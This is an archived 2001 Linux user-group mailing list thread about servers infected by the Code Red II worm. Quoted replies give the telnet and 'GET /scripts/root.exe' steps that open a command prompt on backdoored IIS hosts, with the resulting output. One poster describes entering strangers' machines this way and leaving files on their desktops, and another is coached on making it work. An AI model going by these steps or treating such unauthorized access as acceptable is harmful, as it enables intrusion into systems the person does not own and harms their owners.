CR worm infection attempts

Kim Allen plug-discuss@lists.PLUG.phoenix.az.us
Wed, 8 Aug 2001 13:41:13 -0700 (MST) 

I've been contacting the sites that my server logs shows that have been 
hitting me with the code red signature and so far no one has bothered to 
respond except for one. However that site has told me how secure they are 
and how there is no way that they have any problems. When I sent them the 
portions of my server logs showing they do have problem they threaten 
legal action. Anyone else have had this type of response?

> To answer your question... make sure you're hitting enter TWICE after
> the command.
> 
> As a security guy myself, I'm deeply troubled by what I'm finding.
> Check it out:
> 
> [gary@t0psecret /tmp]# telnet xxx.xxx.xxx.xxx 80
> Trying xxx.xxx.xxx.xxx...
> Connected to xxx.xxx.xxx.xxx.
> Escape character is '^]'.
> GET /scripts/root.exe HTTP/1.0
> 
> HTTP/1.1 200 OK
> Server: Microsoft-IIS/5.0
> Date: Mon, 06 Aug 2001 04:22:13 GMT
> Content-Type: application/octet-stream
> Microsoft Windows 2000 [Version 5.00.2195]
> (C) Copyright 1985-1999 Microsoft Corp.
> 
> c:\inetpub\scripts>
> 
> >From here, I've been leaving a nice text file on \\ALL USERS\\ desktop's
> that explains how I did it, and why they need to pay attention to
> security patches. :)
> 
> Hopefully they won't take it the 'wrong' way.
> 
> ~g~
> 
> On 05 Aug 2001 15:15:02 -0700, Craig White wrote:
> > Wayne Conrad wrote:
> > > 
> > > On Sun, 05 August 2001, "J.Francois" wrote:
> > > > I got tired of counting and just started putting the info into my IDS page.
> > > > That way I can send complaints and point them to a URL so I don't have to
> > > > keep recreating the same data each time.
> > > 
> > > Are you putting the IP's up too?  Every one of the CRII infected boxes is rooted...  I wonder about the goodness of publishing a list of known rooted boxes.
> > >     Wayne
> > ________________________________________________
> > 
> > I've been trying that out
> > 
> > telnet ipaddress_from_my_httpd_access_log 80
> > 
> > GET /scripts/root.exe HTTP/1.0
> > 
> > but I can't get a command prompt - what am I missing?
> > 
> > Craig
> > ________________________________________________
> > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
> > 
> > PLUG-discuss mailing list  -  PLUG-discuss@lists.PLUG.phoenix.az.us
> > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
> > 
> 
> 
> ________________________________________________
> See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
> 
> PLUG-discuss mailing list  -  PLUG-discuss@lists.PLUG.phoenix.az.us
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>